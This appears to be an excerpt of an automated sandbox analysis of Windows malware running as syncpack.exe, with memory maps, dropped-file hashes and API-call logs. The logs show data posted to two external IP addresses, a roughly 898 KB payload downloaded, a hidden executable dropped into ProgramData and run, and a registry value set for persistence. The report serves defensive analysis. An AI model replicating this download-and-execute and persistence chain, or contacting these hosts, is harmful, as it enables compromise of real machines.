shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0xb68
223 0
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 48 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1 Fn
Module Get Address function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1 Fn
Module Load module_name = USER32.dll, base_address = 0x771c0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x771eae5f True 1 Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c0e026 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x76066aa8 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fc5a4b True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75fdeceb True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fc110c True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fc14e9 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fc14c9 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fc1809 True 1 Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1 Fn
System Get Time type = Ticks, time = 198667 True 40 Fn
System Get Time type = Ticks, time = 198682 True 65 Fn
System Get Time type = Ticks, time = 198698 True 53 Fn
System Get Time type = Ticks, time = 198714 True 51 Fn
System Get Time type = Ticks, time = 198729 True 40 Fn
System Get Time type = Ticks, time = 202411 True 10 Fn
System Get Time type = Ticks, time = 202426 True 13 Fn
System Get Time type = Ticks, time = 202442 True 4 Fn
Mutex Create mutex_name = PEMB50 True 1 Fn
Mutex Create mutex_name = PEMB64 True 1 Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, size = 260 True 1 Fn
Process Create process_name = C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe, os_pid = 0xb70, creation_flags = CREATE_HIGH_PRIORITY_CLASS, show_window = SW_HIDE True 1 Fn
Process #6: syncpack.exe
2216 48
Information Value
ID #6
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:02:25, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:02:43
OS Process Information
Information Value
PID 0xb70
Parent PID 0xb64 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB74
0xB88
0xB94
0xB98
0xB9C
0xBA4
0xBDC
0x568
0x878
0x86C
0x868
0x864
0x860
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable True False False -
private_0x0000000000220000 0x00220000 0x0022cfff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000230000 0x00230000 0x0023cfff Private Memory Readable, Writable True False False -
private_0x0000000000240000 0x00240000 0x0025ffff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000260000 0x00260000 0x002dffff Private Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x002f7fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000320000 0x00320000 0x00320fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0033ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00337fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000330000 0x00330000 0x00331fff Pagefile Backed Memory Readable True False False -
private_0x0000000000340000 0x00340000 0x0034ffff Private Memory Readable, Writable True False False -
rsaenh.dll 0x00350000 0x0038bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000350000 0x00350000 0x00357fff Pagefile Backed Memory Readable, Writable True False False -
windowsshell.manifest 0x00350000 0x00350fff Memory Mapped File Readable False False False -
index.dat 0x00350000 0x0035bfff Memory Mapped File Readable, Writable True False False -
pagefile_0x0000000000360000 0x00360000 0x00361fff Pagefile Backed Memory Readable True False False -
index.dat 0x00370000 0x00377fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00380000 0x0038ffff Memory Mapped File Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x003d0fff Private Memory Readable, Writable True False False -
pagefile_0x00000000003d0000 0x003d0000 0x003d0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003e0000 0x003e0000 0x003e0fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000420000 0x00420000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x005dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000005e0000 0x005e0000 0x00767fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000770000 0x00770000 0x008f0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000900000 0x00900000 0x01cfffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False -
private_0x0000000001fd0000 0x01fd0000 0x020cffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x021cffff Private Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x021dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000021d0000 0x021d0000 0x021d7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000021d0000 0x021d0000 0x021d5fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000021e0000 0x021e0000 0x0221ffff Private Memory Readable, Writable True False False -
private_0x0000000002220000 0x02220000 0x0231ffff Private Memory Readable, Writable True False False -
private_0x0000000002320000 0x02320000 0x0241ffff Private Memory Readable, Writable True False False -
private_0x0000000002420000 0x02420000 0x0251ffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x0271ffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x026bffff Private Memory Readable, Writable True False False -
private_0x0000000002520000 0x02520000 0x0261ffff Private Memory Readable, Writable True False False -
private_0x0000000002620000 0x02620000 0x0265ffff Private Memory Readable, Writable True False False -
private_0x0000000002660000 0x02660000 0x0269ffff Private Memory Readable, Writable True False False -
pagefile_0x00000000026a0000 0x026a0000 0x026a7fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000026b0000 0x026b0000 0x026bffff Private Memory Readable, Writable True False False -
private_0x00000000026c0000 0x026c0000 0x026e3fff Private Memory Readable, Writable, Executable True False False -
d3a3.tmp 0x026f0000 0x026f0fff Memory Mapped File Readable True True False
private_0x0000000002710000 0x02710000 0x0271ffff Private Memory Readable, Writable True False False -
private_0x0000000002720000 0x02720000 0x0281ffff Private Memory Readable, Writable True False False -
private_0x0000000002840000 0x02840000 0x0287ffff Private Memory Readable, Writable True False False -
private_0x0000000002880000 0x02880000 0x0297ffff Private Memory Readable, Writable True False False -
private_0x0000000002980000 0x02980000 0x029bffff Private Memory Readable, Writable True False False -
private_0x00000000029c0000 0x029c0000 0x02abffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02afafff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002b00000 0x02b00000 0x02b3ffff Private Memory Readable, Writable True False False -
rasman.dll 0x6c9a0000 0x6c9b4fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
ntmarta.dll 0x74380000 0x743a0fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x743c0000 0x743cdfff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74720000 0x7472afff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
rasapi32.dll 0x74d60000 0x74db1fff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc6.dll 0x74e10000 0x74e1cfff Memory Mapped File Readable, Writable, Executable False False False -
netprofm.dll 0x74e20000 0x74e79fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x74e80000 0x74eb7fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
dhcpcsvc.dll 0x75110000 0x75121fff Memory Mapped File Readable, Writable, Executable False False False -
npmproxy.dll 0x75130000 0x75137fff Memory Mapped File Readable, Writable, Executable False False False -
wship6.dll 0x75140000 0x75145fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x75150000 0x75154fff Memory Mapped File Readable, Writable, Executable False False False -
winrnr.dll 0x75160000 0x75167fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x75170000 0x751abfff Memory Mapped File Readable, Writable, Executable False False False -
pnrpnsp.dll 0x751b0000 0x751c1fff Memory Mapped File Readable, Writable, Executable False False False -
napinsp.dll 0x751d0000 0x751dffff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x751e0000 0x751e5fff Memory Mapped File Readable, Writable, Executable False False False -
nlaapi.dll 0x751f0000 0x751fffff Memory Mapped File Readable, Writable, Executable False False False -
sensapi.dll 0x75200000 0x75205fff Memory Mapped File Readable, Writable, Executable False False False -
rtutils.dll 0x75210000 0x7521cfff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x75220000 0x75226fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x75230000 0x75273fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x75290000 0x752a6fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x752b0000 0x752cbfff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x75420000 0x7542cfff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75870000 0x759a5fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75af0000 0x75b24fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x76260000 0x7637cfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
wldap32.dll 0x76420000 0x76464fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76470000 0x7647bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x772c0000 0x773b4fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x77450000 0x7764afff Memory Mapped File Readable, Writable, Executable False False False -
normaliz.dll 0x77660000 0x77662fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x77bb0000 0x77bb5fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 False
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 False
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 False
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe 0.00 KB MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 False
c:\programdata\oyvgkgw.exe 328.05 KB MD5: cbe11e9a9e71737f15e8f1c606ad8d8c SHA1: 2d4575457d337753a57b7941d13ac9665342641a SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343 False
c:\users\kft6utqw\appdata\local\temp\d3d3.tmp 0.05 KB MD5: f82e7a2f3860bbe2226620e0a569d5bb SHA1: 4e7c4099d0597bc28f4ffea6a00d6c44341ee04c SHA256: b1d64604932a6676690fda7132f96766bd05ed9118247d8ab4c642e9ddbf95f2 False
c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe 77.50 KB MD5: 3290d6946b5e30e70414990574883ddb SHA1: be0144e3235ffde0787e9f1cd34c828ec87d8e19 SHA256: 0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663 False
c:\users\kft6utqw\appdata\local\temp\d3a3.tmp 0.09 KB MD5: 373017c133fb80b96aaec222ce291d38 SHA1: 08db0aebdfd799ce29aa3086abfac8dfccc6816e SHA256: 5571ede5f2c75cadcf4f20a7388db611cff807b47b7a564f853f2cac8af2eb04 False
c:\users\kft6utqw\appdata\local\temp\d3d4.tmp 0.11 KB MD5: 36427ecb2a0faf13af3047c51b29f9c5 SHA1: 9a3fb26927a7aa81255cf8abcc1f1c3e38f28c4f SHA256: ea156f649bb1180b32c6d5be76c0969941ec76d1fface734f401b5327ac57345 False
Threads
Thread 0xb74
1099 37
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 48
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc4c True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fc8c True 1
Fn
Module Get Address function = GetProcAddress, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = VirtualProtect, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x18fb30 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x771eae5f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c0e026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeConsole, address_out = 0x76066aa8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x75fc5a4b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpA, address_out = 0x75fdeceb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x75fc110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75fc14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x75fc14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75fc1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75fc11f8 True 1
Fn
System Get Time type = Ticks, time = 202504 True 61
Fn
System Get Time type = Ticks, time = 202520 True 76
Fn
System Get Time type = Ticks, time = 202536 True 112
Fn
System Get Time type = Ticks, time = 206888 True 1
Fn
System Get Time type = Ticks, time = 206904 True 13
Fn
System Get Time type = Ticks, time = 206919 True 16
Fn
Mutex Create mutex_name = PEMB64 True 1
Fn
System Get Time type = Ticks, time = 206935 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex Create mutex_name = Global\I78B0A7D7 True 1
Fn
Mutex Create mutex_name = Global\M78B0A7D7 True 1
Fn
Mutex Release mutex_name = Global\I78B0A7D7 True 1
Fn
System Get Time type = Ticks, time = 206935 True 1
Fn
Module Load module_name = advapi32.dll, base_address = 0x77740000 True 1
Fn
System Get Time type = Ticks, time = 206935 True 74
Fn
System Get Time type = Ticks, time = 206950 True 78
Fn
System Get Time type = Ticks, time = 206966 True 26
Fn
Module Load module_name = crypt32.dll, base_address = 0x76260000 True 1
Fn
System Get Time type = Ticks, time = 206966 True 50
Fn
System Get Time type = Ticks, time = 206982 True 20
Fn
Module Load module_name = wininet.dll, base_address = 0x772c0000 True 1
Fn
Service Open Manager database_name = SERVICES_ACTIVE_DATABASE False 1
Fn
Module Unmap process_name = c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe True 1
Fn
System Get Computer Name result_out = XABNCPUWKW True 1
Fn
System Get Time type = Ticks, time = 207060 True 17
Fn
System Get Time type = Ticks, time = 207075 True 12
Fn
System Get Time type = Ticks, time = 207091 True 20
Fn
System Get Time type = Ticks, time = 207106 True 2
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Time type = Ticks, time = 207106 True 34
Fn
System Get Time type = Ticks, time = 207122 True 108
Fn
System Get Time type = Ticks, time = 207138 True 107
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 197.245.46.11, server_port = 80 True 1
Fn
System Get Time type = Ticks, time = 207403 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 197.245.46.11 False 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 219197 True 9
Fn
System Get Time type = Ticks, time = 219212 True 13
Fn
System Get Time type = Ticks, time = 219228 True 9
Fn
System Get Time type = Ticks, time = 219243 True 9
Fn
System Get Time type = Ticks, time = 219259 True 7
Fn
System Get Info type = Operating System False 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Time type = Ticks, time = 219275 True 6
Fn
System Get Time type = Ticks, time = 219290 True 32
Fn
System Get Time type = Ticks, time = 219306 True 32
Fn
System Get Time type = Ticks, time = 219321 True 49
Fn
System Get Time type = Ticks, time = 219337 True 70
Fn
System Get Time type = Ticks, time = 219353 True 60
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 216.46.44.93, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 216.46.44.93 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 True 1
Fn
Data
Inet Read Response size = 898612, size_out = 898612 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 248603 True 1
Fn
System Get Time type = Ticks, time = 248618 True 58
Fn
System Get Time type = Ticks, time = 248634 True 120
Fn
System Get Time type = Ticks, time = 248649 True 70
Fn
Registry Write Value value_name = syncpack, data = "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe", size = 130, type = REG_SZ True 1
Fn
System Get Time type = Ticks, time = 250771 True 1
Fn
File Create filename = C:\ProgramData\oyvGkGw.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\ProgramData\oyvGkGw.exe, size = 335922 True 1
Fn
Data
Process Create process_name = C:\ProgramData\oyvGkGw.exe, os_pid = 0x64, show_window = SW_HIDE True 1
Fn
System Get Time type = Ticks, time = 250802 True 1
Fn
System Get Time type = Ticks, time = 250818 True 10
Fn
System Get Time type = Ticks, time = 250865 True 3
Fn
System Get Time type = Ticks, time = 250880 True 10
Fn
System Get Time type = Ticks, time = 250896 True 10
Fn
System Get Time type = Ticks, time = 250912 True 11
Fn
System Get Time type = Ticks, time = 250927 True 4
Fn
System Get Info type = Operating System False 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Time type = Ticks, time = 250927 True 20
Fn
System Get Time type = Ticks, time = 250943 True 88
Fn
System Get Time type = Ticks, time = 250958 True 113
Fn
